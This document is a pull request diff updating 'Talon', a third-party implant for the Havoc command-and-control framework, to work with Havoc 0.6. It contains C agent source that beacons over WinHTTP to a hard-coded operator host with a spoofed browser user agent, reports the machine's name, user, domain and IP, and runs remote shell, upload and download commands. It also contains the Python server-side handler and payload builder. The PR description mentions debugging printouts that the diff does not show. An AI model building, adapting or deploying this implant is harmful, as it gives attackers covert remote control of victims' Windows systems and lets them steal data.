### PR TITLE
Havoc .6 Support

### DIFF
--- a/.idea/.gitignore
+++ b/.idea/.gitignore
@@ -1,0 +1,8 @@
+# Default ignored files
+/shelf/
+/workspace.xml
+# Editor-based HTTP Client requests
+/httpRequests/
+# Datasource local storage ignored files
+/dataSources/
+/dataSources.local.xml

--- a/.idea/Talon.iml
+++ b/.idea/Talon.iml
@@ -1,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module classpath="CMake" type="CPP_MODULE" version="4" />

--- a/.idea/misc.xml
+++ b/.idea/misc.xml
@@ -1,0 +1,6 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="CMakeWorkspace" PROJECT_DIR="$PROJECT_DIR$/Agent">
+    <contentRoot DIR="$PROJECT_DIR$" />
+  </component>
+</project>

--- a/.idea/modules.xml
+++ b/.idea/modules.xml
@@ -1,0 +1,8 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="ProjectModuleManager">
+    <modules>
+      <module fileurl="file://$PROJECT_DIR$/.idea/Talon.iml" filepath="$PROJECT_DIR$/.idea/Talon.iml" />
+    </modules>
+  </component>
+</project>

--- a/.idea/vcs.xml
+++ b/.idea/vcs.xml
@@ -1,0 +1,6 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="VcsDirectoryMappings">
+    <mapping directory="" vcs="Git" />
+  </component>
+</project>

--- a/Agent/CMakeLists.txt
+++ b/Agent/CMakeLists.txt
@@ -13,5 +13,5 @@ set_target_properties(Talon PROPERTIES
         RUNTIME_OUTPUT_DIRECTORY ${CMAKE_BINARY_DIR}/../Bin)
 
 
-target_compile_options(Talon PRIVATE -s -O2 )
+target_compile_options(Talon PRIVATE -s )
 target_link_libraries( Talon iphlpapi winhttp )

--- a/Agent/CMakeLists.txt
+++ b/Agent/CMakeLists.txt
@@ -7,5 +7,11 @@ set( CMAKE_C_COMPILER x86_64-w64-mingw32-gcc )
 include_directories(Include)
 file(GLOB SOURCES "Source/*")
 
-add_executable(Agent ${SOURCES})
-target_link_libraries( Agent iphlpapi winhttp )
+add_executable(Talon ${SOURCES})
+
+set_target_properties(Talon PROPERTIES
+        RUNTIME_OUTPUT_DIRECTORY ${CMAKE_BINARY_DIR}/../Bin)
+
+
+target_compile_options(Talon PRIVATE -s -O2 )
+target_link_libraries( Talon iphlpapi winhttp )

--- a/Agent/CMakeLists.txt
+++ b/Agent/CMakeLists.txt
@@ -4,13 +4,8 @@ project( Talon C )
 set( CMAKE_C_STANDARD 99 )
 set( CMAKE_C_COMPILER x86_64-w64-mingw32-gcc )
 
-include_directories( Include )
+include_directories(Include)
+file(GLOB SOURCES "Source/*")
 
-add_executable( Agent
-    Source/Main.c
-    Source/Command.c
-    Source/Core.c
-    Source/Package.c
-    Source/Transport.c
-    Source/Parser.c
-)
+add_executable(Agent ${SOURCES})
+target_link_libraries( Agent iphlpapi winhttp )

--- a/Agent/Include/Config.h
+++ b/Agent/Include/Config.h
@@ -1,6 +1,6 @@
 
 #define CONFIG_USER_AGENT L"User Agent Test"
 #define CONFIG_HOST       L"192.168.0.148"
-#define CONFIG_PORT       443
+#define CONFIG_PORT       9001
 #define CONFIG_SECURE     FALSE
 #define CONFIG_SLEEP      3

--- a/Agent/Include/Config.h
+++ b/Agent/Include/Config.h
@@ -1,6 +1,6 @@
 
-#define CONFIG_USER_AGENT L"User Agent Test"
-#define CONFIG_HOST       L"192.168.0.148"
+#define CONFIG_USER_AGENT L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
+#define CONFIG_HOST       L"192.168.0.251"
 #define CONFIG_PORT       9001
 #define CONFIG_SECURE     FALSE
 #define CONFIG_SLEEP      3

--- a/Agent/Include/Talon.h
+++ b/Agent/Include/Talon.h
@@ -20,12 +20,12 @@
 #define PROCESS_AGENT_ARCH PROCESS_ARCH_X86
 #endif
 
-#define TALON_MAGIC_VALUE ( UINT32 ) 'talon'
+#define TALON_MAGIC_VALUE ( UINT32 ) 'taln'
 
 typedef struct _INSTANCE {
     struct {
         UINT32  AgentID;
-
+        WORD    ProcArch;
         DWORD   OSArch;
         BOOL    Connected;
     } Session;
@@ -37,11 +37,13 @@ typedef struct _INSTANCE {
 
     struct {
         DWORD Sleeping;
-
+        DWORD Jitter;
         struct {
             LPWSTR UserAgent;
             LPWSTR Host;
             DWORD  Port;
+            UINT64 KillDate;
+            UINT32 WorkingHours;
 
             BOOL   Secure;
         } Transport ;

--- a/Agent/Source/Command.c
+++ b/Agent/Source/Command.c
@@ -99,7 +99,7 @@ VOID CommandShell( PPARSER Parser )
     SECURITY_ATTRIBUTES SecurityAttr    = { sizeof( SECURITY_ATTRIBUTES ), NULL, TRUE };
     STARTUPINFOA        StartUpInfoA    = { };
 
-    Command = ParserGetBytes( Parser, &Length );
+    Command = ParserGetBytes( Parser, (PUINT32) &Length );
 
     if ( CreatePipe( &hStdInPipeRead, &hStdInPipeWrite, &SecurityAttr, 0 ) == FALSE )
     {
@@ -179,7 +179,7 @@ VOID CommandDownload( PPARSER Parser )
     DWORD    FileSize = 0;
     DWORD    Read     = 0;
     DWORD    NameSize = 0;
-    PCHAR    FileName = ParserGetBytes( Parser, &NameSize );
+    PCHAR    FileName = ParserGetBytes( Parser, (PUINT32) &NameSize );
     HANDLE   hFile    = NULL;
     PVOID    Content  = NULL;
 

--- a/Agent/Source/Core.c
+++ b/Agent/Source/Core.c
@@ -11,11 +11,11 @@ VOID TalonInit()
     Instance.Config.Transport.UserAgent = CONFIG_USER_AGENT;
     Instance.Config.Transport.Host      = CONFIG_HOST;
     Instance.Config.Transport.Port      = CONFIG_PORT;
-    Instance.Config.Transport.Secure    = CONFIG_PORT;
+    Instance.Config.Transport.Secure    = 0x0; // NO SECURE
 
     // Init Win32
-    Instance.Win32.RtlRandomEx   = GetProcAddress( GetModuleHandleA( "ntdll" ), "RtlRandomEx" );
-    Instance.Win32.RtlGetVersion = GetProcAddress( GetModuleHandleA( "ntdll" ), "RtlGetVersion" );
+    Instance.Win32.RtlRandomEx   = (ULONG (*)(ULONG *)) GetProcAddress( GetModuleHandleA( "ntdll" ), "RtlRandomEx" );
+    Instance.Win32.RtlGetVersion = (void (*)(struct _OSVERSIONINFOEXW *)) GetProcAddress( GetModuleHandleA( "ntdll" ), "RtlGetVersion" );
 
     Instance.Session.AgentID = RandomNumber32();
     Instance.Config.Sleeping = CONFIG_SLEEP;

--- a/Agent/Source/Main.c
+++ b/Agent/Source/Main.c
@@ -16,9 +16,7 @@ INT WINAPI WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLin
             if ( TransportInit( ) )
                 CommandDispatcher();
         }
-
-        // Instance->Win32.WaitForSingleObjectEx( NtCurrentThread(), Instance->Config.Sleeping * 1000, FALSE );
-
+        
         Sleep( 3 * 1000 );
 
     } while ( TRUE );

--- a/Agent/Source/Package.c
+++ b/Agent/Source/Package.c
@@ -30,21 +30,16 @@ VOID Int64ToBuffer( PUCHAR Buffer, UINT64 Value )
     Buffer[ 0 ] = Value & 0xFF;
 }
 
-VOID Int32ToBuffer( PUCHAR Buffer, UINT32 Size )
-{
+VOID Int32ToBuffer( PUCHAR Buffer, UINT32 Size ) {
     ( Buffer ) [ 0 ] = ( Size >> 24 ) & 0xFF;
     ( Buffer ) [ 1 ] = ( Size >> 16 ) & 0xFF;
     ( Buffer ) [ 2 ] = ( Size >> 8  ) & 0xFF;
     ( Buffer ) [ 3 ] = ( Size       ) & 0xFF;
 }
 
-VOID PackageAddInt32( PPACKAGE Package, UINT32 dataInt )
-{
-    Package->Buffer = LocalReAlloc(
-            Package->Buffer,
-            Package->Length + sizeof( UINT32 ),
-            LMEM_MOVEABLE
-    );
+VOID PackageAddInt32( PPACKAGE Package, UINT32 dataInt ) {
+
+    Package->Buffer = LocalReAlloc(Package->Buffer,Package->Length + sizeof( UINT32 ),LMEM_MOVEABLE);
 
     Int32ToBuffer( Package->Buffer + Package->Length, dataInt );
 
@@ -81,15 +76,10 @@ VOID PackageAddPad( PPACKAGE Package, PUCHAR Data, SIZE_T Size )
 }
 
 
-VOID PackageAddBytes( PPACKAGE Package, PUCHAR Data, SIZE_T Size )
-{
+VOID PackageAddBytes( PPACKAGE Package, PUCHAR Data, SIZE_T Size ) {
     PackageAddInt32( Package, Size );
 
-    Package->Buffer = LocalReAlloc(
-            Package->Buffer,
-            Package->Length + Size,
-            LMEM_MOVEABLE | LMEM_ZEROINIT
-    );
+    Package->Buffer = LocalReAlloc(Package->Buffer,Package->Length + Size,LMEM_MOVEABLE | LMEM_ZEROINIT);
 
     Int32ToBuffer( Package->Buffer + ( Package->Length - sizeof( UINT32 ) ), Size );
 
@@ -108,7 +98,7 @@ PPACKAGE PackageCreate( UINT32 CommandID )
     Package->Buffer    = LocalAlloc( LPTR, sizeof( BYTE ) );
     Package->Length    = 0;
     Package->CommandID = CommandID;
-    Package->Encrypt   = TRUE;
+    Package->Encrypt   = FALSE;
 
     PackageAddInt32( Package, 0 );
     PackageAddInt32( Package, TALON_MAGIC_VALUE );
@@ -136,12 +126,12 @@ PPACKAGE PackageNew(  )
 
 VOID PackageDestroy( PPACKAGE Package )
 {
-    if ( ! Package )
+    if ( ! Package ) {
         return;
-
-    if ( ! Package->Buffer )
+    }
+    if ( ! Package->Buffer ) {
         return;
-
+    }
     memset( Package->Buffer, 0, Package->Length );
     LocalFree( Package->Buffer );
     Package->Buffer = NULL;
@@ -160,8 +150,9 @@ BOOL PackageTransmit( PPACKAGE Package, PVOID* Response, PSIZE_T Size )
         // writes package length to buffer
         Int32ToBuffer( Package->Buffer, Package->Length - sizeof( UINT32 ) );
 
-        if ( TransportSend( Package->Buffer, Package->Length, Response, Size ) )
+        if ( TransportSend( Package->Buffer, Package->Length, Response, Size ) ) {
             Success = TRUE;
+        }
 
         PackageDestroy( Package );
     }

--- a/Agent/Source/Parser.c
+++ b/Agent/Source/Parser.c
@@ -1,21 +1,19 @@
 #include <Parser.h>
 
-VOID ParserNew( PPARSER parser, PVOID Buffer, UINT32 size )
-{
+
+void ParserNew( PPARSER parser, PVOID Buffer, UINT32 size ) {
+
     if ( parser == NULL )
         return;
 
     parser->Original = LocalAlloc( LPTR, size );
-
     memcpy( parser->Original, Buffer, size );
-
     parser->Buffer   = parser->Original;
     parser->Length   = size;
     parser->Size     = size;
 }
 
-INT ParserGetInt32( PPARSER parser )
-{
+int ParserGetInt32( PPARSER parser ) {
     INT32 intBytes = 0;
 
     if ( parser->Length < 4 )
@@ -32,8 +30,7 @@ INT ParserGetInt32( PPARSER parser )
         return ( INT ) __builtin_bswap32( intBytes );
 }
 
-PCHAR ParserGetBytes( PPARSER parser, PUINT32 size )
-{
+PCHAR ParserGetBytes( PPARSER parser, PUINT32 size ) {
     UINT32  Length  = 0;
     PCHAR   outdata = NULL;
 
@@ -60,10 +57,8 @@ PCHAR ParserGetBytes( PPARSER parser, PUINT32 size )
     return outdata;
 }
 
-VOID ParserDestroy( PPARSER Parser )
-{
-    if ( Parser->Original )
-    {
+void ParserDestroy( PPARSER Parser ) {
+    if ( Parser->Original ) {
         memset( Parser->Original, 0, Parser->Size );
         LocalFree( Parser->Original );
         Parser->Original = NULL;

--- a/Agent/Source/Transport.c
+++ b/Agent/Source/Transport.c
@@ -53,10 +53,10 @@ BOOL TransportInit( )
     PackageAddInt32( Package, Instance.Session.AgentID );
 
     // Get Computer name
-    if ( ! GetComputerNameExA( ComputerNameNetBIOS, NULL, &Length ) )
+    if ( ! GetComputerNameExA( ComputerNameNetBIOS, NULL, (LPDWORD) &Length ) )
     {
         if ( ( Data = LocalAlloc( LPTR, Length ) ) )
-            GetComputerNameExA( ComputerNameNetBIOS, Data, &Length );
+            GetComputerNameExA( ComputerNameNetBIOS, Data, (LPDWORD) &Length );
     }
     PackageAddBytes( Package, Data, Length );
     DATA_FREE( Data, Length );
@@ -64,24 +64,24 @@ BOOL TransportInit( )
     // Get Username
     Length = MAX_PATH;
     if ( ( Data = LocalAlloc( LPTR, Length ) ) )
-        GetUserNameA( Data, &Length );
+        GetUserNameA( Data, (LPDWORD) &Length );
 
     PackageAddBytes( Package, Data, strlen( Data ) );
     DATA_FREE( Data, Length );
 
     // Get Domain
-    if ( ! GetComputerNameExA( ComputerNameDnsDomain, NULL, &Length ) )
+    if ( ! GetComputerNameExA( ComputerNameDnsDomain, NULL, (LPDWORD) &Length ) )
     {
         if ( ( Data = LocalAlloc( LPTR, Length ) ) )
-            GetComputerNameExA( ComputerNameDnsDomain, Data, &Length );
+            GetComputerNameExA( ComputerNameDnsDomain, Data, (LPDWORD) &Length );
     }
     PackageAddBytes( Package, Data, Length );
     DATA_FREE( Data, Length );
 
-    GetAdaptersInfo( NULL, &Length );
+    GetAdaptersInfo( NULL, (PULONG) &Length );
     if ( ( Adapter = LocalAlloc( LPTR, Length ) ) )
     {
-        if ( GetAdaptersInfo( Adapter, &Length ) == NO_ERROR )
+        if ( GetAdaptersInfo( Adapter, (PULONG) &Length ) == NO_ERROR )
         {
             PackageAddBytes( Package, Adapter->IpAddressList.IpAddress.String, strlen( Adapter->IpAddressList.IpAddress.String ) );
 
@@ -202,7 +202,7 @@ BOOL TransportSend( LPVOID Data, SIZE_T Size, PVOID* RecvData, PSIZE_T RecvSize 
     }
 
     // Send our data
-    if ( WinHttpSendRequest( hRequest, NULL, 0, Data, Size, Size, NULL ) )
+    if ( WinHttpSendRequest( hRequest, NULL, 0, Data, Size, Size, 0x0 ) )
     {
         if ( RecvData && WinHttpReceiveResponse( hRequest, NULL ) )
         {

--- a/Agent/Talon.py
+++ b/Agent/Talon.py
@@ -1,7 +1,8 @@
 from base64 import b64decode
-
 from havoc.service import HavocService
 from havoc.agent import *
+
+import os
 
 COMMAND_REGISTER         = 0x100
 COMMAND_GET_JOB          = 0x101
@@ -118,7 +119,7 @@ class CommandExit( Command ):
 # =======================
 class Talon(AgentType):
     Name = "Talon"
-    Author = "@C5pider"
+    Author = "@C5pider + 0xtriboulet"
     Version = "0.1"
     Description = f"""Talon 3rd party agent for Havoc"""
     MagicValue = 0x616c6f6e # 'talon'
@@ -156,8 +157,14 @@ class Talon(AgentType):
         self.builder_send_message( config[ 'ClientID' ], "Info", f"Options Config: {config['Options']}" )
         self.builder_send_message( config[ 'ClientID' ], "Info", f"Agent Config: {config['Config']}" )
 
+	# make and cmake
+        os.system("cmake . && make")
+	
+	# open .exe
+        data = open("./Bin/Talon.exe", "rb").read()
+	
         # build_send_payload. this function send back your generated payload 
-        self.builder_send_payload( config[ 'ClientID' ], self.Name + ".bin", "test bytes".encode('utf-8') ) # this is just an example. 
+        self.builder_send_payload( config[ 'ClientID' ], self.Name + ".exe", data) # this is just an example. 
 
     # this function handles incomming requests based on our magic value. you can respond to the agent by returning your data from this function. 
     def response( self, response: dict ) -> bytes:
@@ -294,7 +301,7 @@ def main():
 
     print( "[*] Connect to Havoc service api" )
     Havoc_Service = HavocService(
-        endpoint="ws://192.168.0.148:40056/service-endpoint",
+        endpoint="wss://127.0.0.1:40056/service-endpoint",
         password="service-password"
     )
      

--- a/Agent/Talon.py
+++ b/Agent/Talon.py
@@ -31,7 +31,7 @@ class CommandShell(Command):
     ]
     Mitr = []
 
-    def job_generate( self, arguments: dict ) -> bytes:        
+    def job_generate( self, arguments: dict ) -> bytes:
         Task = Packer()
 
         Task.add_int( self.CommandId )
@@ -61,7 +61,7 @@ class CommandUpload( Command ):
     ]
 
     def job_generate( self, arguments: dict ) -> bytes:
-        
+
         Task        = Packer()
         remote_file = arguments[ 'remote_file' ]
         fileData    = b64decode( arguments[ 'local_file' ] )
@@ -88,7 +88,7 @@ class CommandDownload( Command ):
     ]
 
     def job_generate( self, arguments: dict ) -> bytes:
-        
+
         Task        = Packer()
         remote_file = arguments[ 'remote_file' ]
 
@@ -122,7 +122,7 @@ class Talon(AgentType):
     Author = "@C5pider + 0xtriboulet"
     Version = "0.1"
     Description = f"""Talon 3rd party agent for Havoc"""
-    MagicValue = 0x616c6f6e # 'talon'
+    MagicValue = 0x74616c6e # 'taln'
 
     Arch = [
         "x64",
@@ -147,35 +147,35 @@ class Talon(AgentType):
         CommandExit(),
     ]
 
-    # generate. this function is getting executed when the Havoc client requests for a binary/executable/payload. you can generate your payloads in this function. 
+    # generate. this function is getting executed when the Havoc client requests for a binary/executable/payload. you can generate your payloads in this function.
     def generate( self, config: dict ) -> None:
 
         print( f"config: {config}" )
 
-        # builder_send_message. this function send logs/messages to the payload build for verbose information or sending errors (if something went wrong). 
+        # builder_send_message. this function send logs/messages to the payload build for verbose information or sending errors (if something went wrong).
         self.builder_send_message( config[ 'ClientID' ], "Info", f"hello from service builder" )
         self.builder_send_message( config[ 'ClientID' ], "Info", f"Options Config: {config['Options']}" )
         self.builder_send_message( config[ 'ClientID' ], "Info", f"Agent Config: {config['Config']}" )
 
-	# make and cmake
+        # make and cmake
         os.system("cmake . && make")
-	
-	# open .exe
-        data = open("./Bin/Talon.exe", "rb").read()
-	
-        # build_send_payload. this function send back your generated payload 
-        self.builder_send_payload( config[ 'ClientID' ], self.Name + ".exe", data) # this is just an example. 
 
-    # this function handles incomming requests based on our magic value. you can respond to the agent by returning your data from this function. 
+        # open .exe
+        data = open("./Bin/Talon.exe", "rb").read()
+
+        # build_send_payload. this function send back your generated payload
+        self.builder_send_payload( config[ 'ClientID' ], self.Name + ".exe", data) # this is just an example.
+
+    # this function handles incomming requests based on our magic value. you can respond to the agent by returning your data from this function.
     def response( self, response: dict ) -> bytes:
 
         agent_header    = response[ "AgentHeader" ]
-        agent_response  = b64decode( response[ "Response" ] ) # the teamserver base64 encodes the request. 
+        agent_response  = b64decode( response[ "Response" ] ) # the teamserver base64 encodes the request.
         response_parser = Parser( agent_response, len(agent_response) )
         Command         = response_parser.parse_int()
 
         if response[ "Agent" ] == None:
-            # so when the Agent field is empty this either means that the agent doesn't exists. 
+            # so when the Agent field is empty this either means that the agent doesn't exists.
 
             if Command == COMMAND_REGISTER:
                 print( "[*] Is agent register request" )
@@ -210,12 +210,12 @@ class Talon(AgentType):
                     "Process Elevated"  : response_parser.parse_int(),
                     "OS Build"          : str(response_parser.parse_int()) + "." + str(response_parser.parse_int()) + "." + str(response_parser.parse_int()) + "." + str(response_parser.parse_int()) + "." + str(response_parser.parse_int()), # (MajorVersion).(MinorVersion).(ProductType).(ServicePackMajor).(BuildNumber)
                     "OS Arch"           : response_parser.parse_int(),
-                    "Sleep"             : response_parser.parse_int(),
+                    "SleepDelay"             : response_parser.parse_int(),
                 }
 
                 RegisterInfo[ "Process Name" ] = RegisterInfo[ "Process Path" ].split( "\\" )[-1]
 
-                # this OS info is going to be displayed on the GUI Session table. 
+                # this OS info is going to be displayed on the GUI Session table.
                 RegisterInfo[ "OS Version" ] = RegisterInfo[ "OS Build" ] # "Windows Some version"
 
                 if RegisterInfo[ "OS Arch" ] == 0:
@@ -235,13 +235,13 @@ class Talon(AgentType):
                 if RegisterInfo[ "Process Arch" ] == 0:
                     RegisterInfo[ "Process Arch" ] = "Unknown"
 
-                elif RegisterInfo[ "Process Arch" ] == 1: 
+                elif RegisterInfo[ "Process Arch" ] == 1:
                     RegisterInfo[ "Process Arch" ] = "x86"
 
-                elif RegisterInfo[ "Process Arch" ] == 2: 
+                elif RegisterInfo[ "Process Arch" ] == 2:
                     RegisterInfo[ "Process Arch" ] = "x64"
 
-                elif RegisterInfo[ "Process Arch" ] == 3: 
+                elif RegisterInfo[ "Process Arch" ] == 3:
                     RegisterInfo[ "Process Arch" ] = "IA64"
 
                 self.register( agent_header, RegisterInfo )
@@ -260,10 +260,10 @@ class Talon(AgentType):
 
                 Tasks = self.get_task_queue( response[ "Agent" ] )
 
-                # if there is no job just send back a COMMAND_NO_JOB command. 
+                # if there is no job just send back a COMMAND_NO_JOB command.
                 if len(Tasks) == 0:
                     Tasks = COMMAND_NO_JOB.to_bytes( 4, 'little' )
-                
+
                 print( f"Tasks: {Tasks.hex()}" )
                 return Tasks
 
@@ -287,7 +287,7 @@ class Talon(AgentType):
                 FileContent = response_parser.parse_str()
 
                 self.console_message( AgentID, "Good", f"File was downloaded: {FileName} ({len(FileContent)} bytes)", "" )
-                
+
                 self.download_file( AgentID, FileName, len(FileContent), FileContent )
 
             else:
@@ -297,14 +297,14 @@ class Talon(AgentType):
 
 
 def main():
-    Havoc_Talon = Talon()
+    Havoc_Talon: Talon = Talon()
 
     print( "[*] Connect to Havoc service api" )
     Havoc_Service = HavocService(
         endpoint="wss://127.0.0.1:40056/service-endpoint",
         password="service-password"
     )
-     
+
     print( "[*] Register Talon to Havoc" )
     Havoc_Service.register_agent(Havoc_Talon)
 


### PR DESCRIPTION
Changes have been made to the user agent and host settings in the 'Config.h' file. Also, the magic value in 'Talon.h' was slightly altered, and additional parameters like 'ProcArch', 'Jitter', 'KillDate', and 'WorkingHours' were added to the '_INSTANCE' struct. Some debugging printouts were placed into 'Transport.c' to improve the diagnosing of network errors.

In terms of cleanup, code blocks previously divided into multiple lines were condensed into single lines for readability and consistency across the 'Package.c', 'Command.c', and 'Parser.c' files, among others. Also, the encryption flag was deactivated in 'Package.c', which would make it easier to debug the application.

Moreover, casting was explicitly set for several function pointers in the 'Core.c' file, which would help avoid potential issues with data type inconsistencies. Lastly, unnecessary comments were removed from the 'Main.c' file.

All these changes intend to streamline the application's functionality and enhance its readability and maintainability.

In short: It works with Havoc .6+ now